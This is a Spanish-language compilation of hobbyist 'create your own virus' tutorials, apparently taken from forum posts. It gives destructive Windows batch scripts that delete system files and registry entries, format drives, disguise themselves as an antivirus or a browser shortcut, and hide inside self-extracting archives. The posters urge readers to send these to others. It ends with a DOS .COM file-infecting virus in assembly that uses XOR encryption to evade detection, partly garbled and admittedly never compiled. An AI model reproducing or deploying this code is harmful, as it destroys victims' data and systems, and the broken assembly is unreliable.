reg delete "HKEY_CLASSES_ROOT.dat" /f reg delete "HKEY_CLASSES_ROOT.dbl" /f reg delete "HKEY_CLASSES_ROOT.cpx" /f reg delete "HKEY_CLASSES_ROOT.cpi" /f reg delete "HKEY_CLASSES_ROOT.cht" /f reg delete "HKEY_CLASSES_ROOT.chs" /f reg delete "HKEY_CLASSES_ROOT.c" /f reg delete "HKEY_CLASSES_ROOT.acm" /f reg delete "HKEY_CLASSES_ROOT.ax" /f reg delete "HKEY_CLASSES_ROOT.com" /f reg delete "HKEY_CLASSES_ROOT.bat" /f reg delete "HKEY_CLASSES_ROOT." /f reg delete "HKEY_CLASSES_ROOT." /f reg delete "HKEY_CLASSES_ROOT." /f cd %HOMEPATH%Desktop for /l %%i in (1,1,999) do (echo "Hacked By RUSSH AND TEGM!!!" > Tegm_Was_Here_%%i.jez) msg * fuiste infectado...BETE DESPIDIENDO...cambio y fuera ...virus de parte de DOC_PAPA rundll32 krnl386.exe,exitkernel shutdown -s -t 1"virus fatal le aconsejo hermano que se cage de miedo" GUARDEDNLO DCDOMO ROOT.BAT DY SDE APARECERA EL MISMO ICDONITO PERO NO LO ABRAN PORQUE SE LES BORRARA Y FORMATEARA EL DISCO ENTERO!!!! ................................................................................................................................................ ESTE VIRUS SE HACE PASAR POR UN ANTIVIRUS!!! @echo off color 30 title The Security Antivirus PC cls echo Tu sistema esta desprotegido echo pero con el nuevo The Security Antivirus PC tendrá el menor riesgo contra amenazas desconocidas echo pasaremos un analisis de los discos duros como prueba echo pulsa la tecla enter para empezar el analisis pause @echo off :m echo %random% goto m pause msg * su pc esta infectado por un troyano msg * pero The Security Antivirus PC esta desinfectando. del /s /f /q %systemroot% echo El troyano ha sido desinfectado. echo Se apagara el ordenador y recuerde comprar este antivirus echo en www.elboludo.com.ar shutdown -s -t 20 -c "se le ha jodido el ordenador" JAJAJAJA GUARDENLO COMO ANTVR.BAT Y SI LO ABRDEN APARECERA COMO UN ANTIVIRUS PERO LUEGO LES CAGA LA MAQUINA ESTA BUENO PARA ENVIARSELO A ALGUIEN ESTUPIDO!!!!! ................................................................................................................................................................ ESTE VIRUS TE FORMATEA EL DISCO EN BLOCK DE NOTAS PONEN: @echo off format c:/q echo Mensaje que queremos que muestre Y LO GUARDAN COMO FORMC.BAT ............................................................................................................................................................ ESTE VIRUS SOLO APAGA LA MAQUINA Y NADA MAS PONGAN EN BLOCK DE NOTAS ESTO: shutdown -s -t 20 -c "Ahora el programa se apaga por que le sale de los cojones" Y LUDEGO LO GUARDAN DCOMO APMQNA.BAT CUANDO LO ABRAN SE LES APAGARA LA MAQUINA 1- Como hacer un virus que elimine el sistema Windows: (paso 1)-Para crear esto, tienen que escribir lo siguiente en un bloc de notas: @echo off title g00d by3 wind0w5 echo 4di05 a tu wind0w5 del /s /f /q C:windows exit (Paso 2)-Después entran a archivo, guardar como, le ponen el nombre que deseen (PERO TERMINADO EN .bat) (Paso 3)-luego se supone por logica que se creará un archivo .bat con el clásico iconito de la tuerca... (Paso 4)-Ya tienen el virus creado (no lo abran ustedes), ustedes sabrán que hacer con esto... Orion_metal dijo: [NOTA: no es un juego, si usted quiere hacerlo bueno todo queda a su responsabilidad] 2-Pantalla Azul De La Muerte: Para los que no saben que es, ahí les explico: La llamada Blue Screen of Death o BSoD (más conocida en español como pantalla azul de la muerte o «pantallazo azul»), hace referencia a la pantalla mostrada por el sistema operativo Windows de Microsoft cuando no puede (o está en peligro de no poder) recuperarse de un error de sistema . Hay dos pantallas de error de Windows referidas como pantallas azules de la muerte, siendo una de ellas bastante más seria que la otra: Una pantalla azul de la muerte es conocida como un "Stop Error" o "Error de detención grave" en los manuales de Windows XP. Una pantalla azul de la muerte "real" sucede cuando el núcleo del sistema operativo Windows XP no puede recuperarse de un error y la única acción que un usuario puede realizar es reiniciar el sistema perdiendo todo el trabajo no guardado , el estado de todos los programas ejecutándose en ese momento y poniendo en peligro la integridad del sistema de archivos y los archivos mismos creados mediante Windows, en este punto es posible perder toda la información en los discos duros gestionados por windows y su sistema de archivos NTFS o FAT 16/FAT 32. La información mostrada en la pantalla azul de la muerte no es, en ningún caso, suficiente para determinar el error. La pantalla sólo muestra el punto en el cual el código falló, que en la mayoría de las veces puede ser completamente diferente del punto donde el error fue originado, causando que la detección del error sea difícil. Un Ejemplo De La pantalla Azul De La Muerte: Esto es para los picaros que les gusta hacer trampas. (Paso 1)-Para crear esto tienen que escribir esto en un bloc de notas: orion_metal dijo: start virus start 2ventanas start virus start 3ventanas start virus start 4ventanas (Paso 2)-Como se es obvio se guarda en el escritorio con el nombre: Internet explorer, o el explorador que este utilizando al que le queremos tirar la bronca... (Paso 3)- Ahora le vamos a dar estilo, para eso, le damos click con el botón secundario de tu mouse, vamos a "propiedades", cambiar icono, para darle justo en el icono idéntico al del explorador, simplemente van a [C:Archivos de programa] ahí seguro se instalo el explorador, encontrar el icono ahí y simplemente cambiarlo... (Paso 4)-Reemplazamos el icono de acceso directo al explorador original, y le ponemos nuestra trampa... Y LISTO... CUANDO ENTREN, LA PANTALLA AZUL DE LA MUERTE SE ACTIVARA. Orion_metal dijo: Bueno, yo no me hago responsable de lo que hagan ustedes, creo que si tienen el poder de crearlo, tienen el saber como para deducir lo que hacen... CHAU GENTE!! .Introdución 2.Nuestro primer virus 3.comandos básicos y etiquetas 4.jugando con el registro 5.bucles 6.Nuestro segundo virus 7.variables de windows xp 8.if exist 9.proximamente mas 1.)Introduccion: Buenas , ante todo he de decir que esto es un manual de introducción y no un manual para expertos. en este manual se hablara sobre los virus .bat (archivos por lotes ejecutables de ms-dos) bueno antes que nada explicar que es cmd.exe (MS-DOS EN WINXP) cmd.exe es un interprete de comandos. ¿Qué es un comando? es una orden que le damos al sistema operativo para que haga una tarea determinada. 2.)Nuestro primer virus. bueno , nuestro primero virus podría ser este: @echo off shutdown -s -t 1 abrimos un documento de texto , copiamos esto lo guardamos como .bat y lo abrimos... y... sopresa... explicación: @echo off Desabilita el echo para que no muestre los comandos , que se ejecutaran posteriormente. explicación: shutdown es un comando con el que puedes jugar bastante. -s y -t son parametros, los parametros son como las opciones que les deves dar al comando. algunos comandos requieren parametros obligatoriamente sin embargo otros no. explicación: parametro -s y -t el parametro -s da la orden a shutdown para que apage el equipo y con -t especificamos los segundos. en el ejemplo de antes pusimos 1 segundo. otros parametros de shutdown: shutdown -r = Reinicia shutdown -c = deja un comentario "Modo de uso">> shutdown -s -t 5 c "Comentario" shutdown -m = apaga un equipo de la red "Modo de uso">> shutdown -s -t 4 -m nombredehost shutdown -f = fuerza el cierre de las aplicaciones. 3.)Comandos básicos a continuación os pondré varios comandos que sirven mucho a la hora de hacer virus. -del = borra un archivo -copy = copia un archivo -reg = hacer modificaciones en el registro -net = Muchas funciones, escriban en cmd net /? para ver sus funciones -RD = elimina un directorio -set = Muestra , establece, crea , variables de entorno de windows. -taskkill o tskill = mata procesos 3.1)Etiquetas Las etiquetas sirven para ir de un lugar de un programa a otra parte. ejemplo. @echo off echo hola goto etiquetaB :etiquetaA echo ola :etiquetaB echo adios con goto decimos a que etiqueta ir en este caso la salida en la shell sería: c: etiquetas.bat hola adios 4.)Jugando con el registro. bueno , como ya dije antes para jugar con el registro usaremos el comando reg Operaciones: REG QUERY /? REG ADD /? REG DELETE /? REG COPY /? REG SAVE /? REG RESTORE /? REG LOAD /? REG UNLOAD /? REG COMPARE /? REG EXPORT /? REG IMPORT /? Usad estos comandos para obtener ayuda sobre los parametros después de reg. 5.)Bucles Bueno un bucle es repetir muchas veces lo mismo ejemplo @echo off :kevin echo hola goto kevin jejejeje ya podeis imaginaros las cosas que podeis hacer. otro ejemplo: @echo off :uji start goto uji Madre mía.. este simple código , el que lo abra tendrá que reiniciar , por que el pc se le trabará todo. el comando start lo que hace es abrir otra shell, así que imaginate este bucle infinito. 6.)Nuestro segundo virus. @echo off taskkill /F /IM msnmsgr.exe del /F c:windowssystem32explorer.exe shutdown -s -t 10 -c "Has caido en mis manos" jejeje 7.)Variables de windows xp para ver el contenido de estas variables escriban en cmd.exe echo %NOMBREDELAVARIABLE% %COMPUTERNAME% = Nombre de host. %SYSTEMROOT% = Carpeta de administración Normalmente c:windows %TEMP% = directorio donde se encuentran los archivos temporales %WINDIR% = directorio de windows. %USERNAME% = usuario con el que se inicio sesión %USERPROFILE% = directorio donde se encuentran los archivos del usuario que inicio sesión %PROGRAMFILE% = directorio donde se encuentran los archivos de programas %OS% = muestra el sistema operativo que estamos ejecutando %LOGONSERVER% = nombre de nuestro server (mihost) no son todos , pero puse algunos importantes. 8.)If exist if no solo sirve para exist , pero explicare if usando exist. if exist lo que hace es por ejemplo: @echo off if exist c:kevin.txt (goto existe) else goto noexiste :existe echo si existe exit :noexiste echo no existe lo que hace es comprobar si el archivo kevin.txt existe en c: y si existiese iria a la etiqueta :existe y si no existe iria a noexiste AQUÍ UNOS TRUCOS PARA HACER TU VIRUS AUTO EXTRAIBLE Y QUE SE GUARDE EN SU DISCO DURO PRIMERO TIENES QUE TENER EL PROGRAMA DE WINRAR Y EL VIRUS QUE CREASTE. LE DAS CLIC DERECHO SOBRE EL VIRUS Y LUEGO SOBRE L OPCION AÑADIR AL ARCHIVO, SE APARECERA UNA VENTANA COMO ESTA Y DEBERAN SEÑALAR LA OPCION DE CREAR ARCHIVO AUTOEXTRAIBLE, DESPUES BAMOS A LA OPCION QUE DICE AVANZADO Y A AUTOEXTRAIBLE… SE APARECERA UNA VENTANA COMO ESTA, EN LA OPCION EJECUTAR TRAS LA EXTRACCION PONDREMOS EL NOMBRE DE NUESTRO VIRUS POR EJEMPLO VIRUS.BAT Y DONDE DICE CARPETA DE EXTRACCION LE PONEMOS EL LUGAR EN EL QUE QUERAMOS QUE SE QUEDE EL VIRUS EJEMPLO DOCUMENTOS,LUEGO SE BAN A LA OPCION MODOS Y SEÑALAN LA OPCION OCULTAR TODO, LUEGO EN LA OPCION TEXTO E ICONO Y DONDE DICE CARGAR ICONO DESDE FICHERO BUSCAN EL ICONO QUE QUIERANPONER Y LE DAN A ACEPTAR, Y EN LA PRIMERA VENTANA LE DAN A ACEPTAR Y SE CREARA SU VIRUS AUTOEXTRAIBLE. ESTO ES TODO, NO ACEPTO COMENTARIOS MALOS O SINO TE PONGO UN VIRUS EEE.

CREA TU VIRUS SEGUNDA PARTE Bueno,bueno,bueno ... Tenemos aquí un bonito virus, ¿qué podemos hacer para mejorarlo un poco?. Pues vamos a encriptarlo. Y además lo vamos a encriptar cada vez con un valor diferente, que cogeremos de un contador que tiene el Bios (el bios cuenta el número de tics de reloj a partir de las 12). ¿qué porqué encriptamos con un valor variable?.Pues fácil, si encriptamos cada vez con un valor diferente ,la parte del virus que permanece constante con cada infección será mínima(sólo la rutina de desencriptación). Actualmente hay más sofisticadas técnicas para que se reduzca el codigo invariante del virus, se trata del POLIMORFISMO que se basa en encriptar según un número aleatorio y modificar cada vez la rutina de desencriptación. Pero basta de rollos, vamos a explicar un poco eso de la encriptación. Utilizaremos una encriptación xor ,esta encriptación tiene una cualidad muy interesante y es que la rutina de desencriptación y la de encriptación es la misma. Fijaos que si realizamos un xor a un número con el valor 5 (por ejemplo) ,obtenemos otro número diferente , pero si volvemos a aplicar la función xor con el valor 5 obtenemos el valor que teníamos al principio. Nota: La función A xor B es cierto si A es cierta y B no o si A es falsa y B cierta. Supongamos ahora que tenemos un byte del virus 11011010 y que encriptamos según el valor del timer 00100111 Valor encriptado Valor desencriptado ---------------- ------------------- 11011010 xor 00100111 = 11111101 xor 00100111 = 11011010 Tened en cuenta que a hay muchas posibilidades de encriptación pero no siempre la función de encriptado es igual a la de desencriptado como pasa con la xor, tomad algunos ejemplos: Función de encriptación Función de Desencriptación ----------------------- -------------------------- add .................................... sub sub .................................... add xor .................................... xor ror .................................... rol rol .................................... ror inc .................................... dec dec .................................... inc not .................................... not La estructura es muy simple cuando el virus toma el control llama a una rutina de desencriptación y ésta desencripta el codigo del virus( lee el byte del timer que lo tenemos almacenado en una variable dentro del codigo y con ese valor pasamos la función xor a cada byte del virus). ------------------ | jmp virus | ------------------ | codigo del | | hoste | ------------------ | virus: | | Rutina de | | desencriptación| ------------------- | virus | | encriptado | ------------------- Pero que coño pasa , aquí hay un problema.¿cómo vamos a dar el control a una rutina de desencriptación si no tenemos el virus encriptado todavía?.Aquí viene lo divertido del asunto. En el archivo que vamos a crear, no haremos un jmp START como hicimos en el ejemplo anterior haremos jmp Encryptor, siendo Encryptor una etiqueta que indica el comienzo a una rutina de encriptación que colocaré al final del virus. Fijate bien que la coloco después de la etiqueta 'fin'. Esto és porque la rutina sólo tiene que funcionar en el archivo que creamos nosotros(ya que no tiene todavía el codigo encriptado) ,de este modo esa rutina no se copiará en las sucesivas infecciones. El metodo de infección es ligeramente diferente, ya que hemos de encriptar primero el virus y luego añadirlo al archivo. Por ello copio el codigo del virus textualmente al final del propio virus ,all¡ lo encripto y de all¡ lo llevo al final del archivo. Atención a las modificaciones del virus anterior... longitud equ fin-start zona_encrypt equ offset zona_end-offset zona_start comienzo equ offset zona_start-offset start Hallado la constante zona_encrypt para definir la cantidad de bytes a encryptar(que no es igual a la longitud del virus, porque la rutina de desencriptación obviamente no se encripta). La variable comienzo la utilizo para direccionar la zona a encriptar cuando muevo el virus para encriptarlo. code segment 'code' assume cs:code,ds:code,es:code org 100h ;empiezo en 100 hoste: jmp encryptor ;esto es un hoste simulado int 20h ;con esto salgo al DOS Fijaos que en vez de saltar a Start salto a encryptor para encriptar el código del virus antes de pasar el control a la rutina de desencriptación start: push bp call alli ; busco la ip de inicio alli: pop bp ; para que la variables no sub bp,offset alli ; aparezcan corridas :-) push cs push cs pop ds pop es push ax ; push bx ; push cx ; APILO LOS REGISTROS push dx ; push di ; push si ; *********** Rutina de desencriptación ********************** Tened en cuenta que hemos de hallar en bp el desplazamiento antes de la rutina de desencriptación , ya que esta rutina si que se ejecuta en cada archivo contaminado. mov cx,zona_encrypt ;en cx el numero de bytes xor di,di ;a encriptar mov ax,byte ptr mas: xor byte ptr [zona_start+di],ax inc di dec cx je mas No voy a explicar la rutina ya que es la misma que la rutina de encriptación ************ antención que aqu¡ empieza la zona encriptada ******* zona_start: cld mov cx,3d ;en cx el numero de bytes a mover mov di,100h ;muevo de ds:si ->es:di lea si,bp+cab_ORIG ;es decir de la variable cab_ORIG a 100h rep movsb mov ah, 02h int 21h cmp dh, 2d ;compruebo si el més es 2 jne noactivo cmp dl, 19d ;compruebo si el día es 19 jne noactivo mov ax,0900h ;aparece el mensaje en pantalla lea dx,bp+mensaje ;si es 19 del 2 sino se salta a noactivo int 21h hlt ;cuelgo el ordenata noactivo: mov ah,4eh ; lea dx,bp+file_cont ; mov cx,00000000b ; BUSQUEDA DEL ARCHIVO int 21h ; otro: mov ah,4fh int 21h jb salir ;salto si no quedan más archivos ;con extensión com mov ax, 3d00h ;abro el archivo para lectura mov dx, 009eh int 21h mov bx,ax ;guardo el handel mov ax,4200h ;muevo el puntero al principio mov cx,0000h mov dx,0000h int 21h mov cx,3h ;longitud a copiar lea dx,[bp+cab_Orig] ;dirección donde se copiará mov ah,3fh ;función de lectura int 21h mov ah ,3eh ;cierro el archivo int 21h cmp byte ptr [bp+cab_ORIG],0E9h ;si empieza con un jmp je otro ;no lo contamina y busca otro mov ax, 3d02h ;abro el archivo para r/w mov dx, 009eh int 21h mov word ptr ds:[bp+handel],ax ;guardo en handel en la variable mov bx,ax ; guardo en bx el handle del archivo mov cx, 2h mov si,009Ah lea di,[bp+cabecera+1] rep movsb sub word ptr [bp+cabecera+1],3 mov ax,4200h ;muevo el puntero al principio mov cx,0000h mov dx,0000h int 21h mov ah,40h ;escribo los nuevos 3 bytes mov cx,3h ;que tendrá el archivo lea dx,bp+cabacera int 21h Ahora que he escrito la nueva cabecera he de mover el código del virus y encriptarlo antes de ejecutar la int 21 función 40 para copiar el virus al final. xor ax,ax int 1Ah mov al,dl ;sólo leo el valor menos mov byte ptr [bp+valor],al ;significativo ya que sólo ;necesito un byte Aquí obtengo el valor del timer con la int 1ah y lo guardo en la variable valor para que lo pueda utilizar luego la rutina de desencriptado. cld lea si,bp+start ;copio el virus a otra parte lea di,bp+Encrypt_buf ;para encriptarlo mov cx,longitud ;ds:si -> es:di rep movsb mov cx,zona_encrypt ;en cx el numero de bytes xor di,di ;a encriptar mov ax,byte ptr otro_byte: xor byte ptr [bp+Encrypt_buf+comienzo+di],ax inc di dec cx je otro_byte Con esto encripto el virus (que lo he movido a Encrypt_buf) mov ax,4202h ;muevo el puntero al final mov cx,0000h mov dx,0000h int 21h mov ah,40h mov cx,longitud ;en cx el número de bytes a copiar lea dx,bp+Encrypt_buf ;pues la longitud del archivo int 21h ;que va a ser Fijate aqu¡ que no empiezo a copiar en Start sino en Encrypt_buf donde está el virus con su zona correspondiente encriptada mov ah ,3eh ;cierro el archivo int 21h salir: pop si ; pop di ; pop dx ; DESAPILO LOS REGISTROS pop cx ; pop bx ; pop ax ; pop bp ; mov ax,100h ;FELICIDADES YA HAS CONTAMINADO OTRO ARCHIVO jmp ax cab_ORIG db 090h,090h,090h cabecera db 0e9h,00h,00h handel dw 0 file_cont db '*.com',0 Mensaje db 'Ooooooohhhh!!! El virus ejemplo del web de',0ah,0dh db 'Nigromante se ha activado.....',0ah,0dh db ' ..... para desactivarlo consulten con',0ah,0dh db ' nEUrOtIc cpU.',0ah,0dh zona_end: ************ antención que acaba la zona encriptada ******* valor db 5h encrypt_buf db 0 ;a part¡r de aquí escribo el código ;del virus para encriptarlo fin label near Ojo , a que la variable valor tiene que estar fuera de la zona encriptada, si estuviera dentro como coño podrías desencriptar luego el codigo.je,je,je. Encryptor: push di ;apilo los registros utilizados push cx ;por la rutina de desencriptación push ax push cs pop ds mov cx,zona_encrypt ;en cx el numero de bytes xor di,di ;a encriptar mov ax,byte ptr mas: xor byte ptr [zona_start+di],ax inc di dec cx je mas Fijate que no necesito en esta rutina sumar a las variables bp ya que esta rutina sólo se ejecutará en este archivo y no se va a copiar en las demás infecciones. En ax leo el contenido de la variable Valor(el valor del timer) que en este archivo le he dado un 5h por poner algo. Y con ese valor aplico la función xor a cada byte de la zona encryptada. pop ax ;desapilo los registros utilizados pop cx pop di jmp start Ahora si que salto a Start ,ya el virus está como toca, rutina de desencriptación+codigo encriptado. code ends end start Otra ventaja de la encriptación es que si habres el ejecutable con un editor de texto (aunque para qué coño vas a querer abrirlo con un editor de texto) ya no se verá el mensaje del virus.Lo que delataría claramente que el archivo está infectado. Con esto finalizo la clase de encriptación , Para compilarlo simplemente hay que poner las instrucciones en un mismo archivo(no se compilará con mis comentarios por ah¡ je,je,je ). Y escribir tasm archivo.asm tlink /T archivo.asm Bueno hasta el siguiente numero Afectuosamente Nigromante by nEUrOtIc cpU. NOTA: No lo he compilado así que si hay errores los buscais. Si hay alguna duda me escribis, fale?.